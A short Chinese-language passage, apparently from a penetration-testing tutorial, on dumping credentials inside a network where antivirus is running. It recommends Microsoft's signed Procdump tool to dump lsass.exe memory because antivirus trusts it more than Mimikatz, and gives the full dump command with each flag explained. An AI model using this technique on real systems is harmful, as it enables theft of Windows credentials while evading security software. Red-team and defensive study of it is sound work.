内网有杀软又怎么抓

1. 使用 Procdump 转储 lsass.exe 进程

Procdump 是微软 Sysinternals 工具集中的一个合法程序，它的主要功能是创建进程的内存转储文件（Memory Dump）。这个工具通常被系统管理员用来诊断程序崩溃

由于 Procdump 是一个合法的、微软签名的工具，很多杀毒软件默认将其视为可信程序，或者至少不会像对待 Mimikatz 那样立即拦截它对 lsass.exe 的访问

• 命令： procdump64.exe -accepteula -ma lsass.exe lsass.dmp
• 解释：
  • -accepteula：接受许可协议，避免交互式提示
  • -ma：指定转储整个内存
  • lsass.exe：目标进程
  • lsass.dmp：输出的转储文件名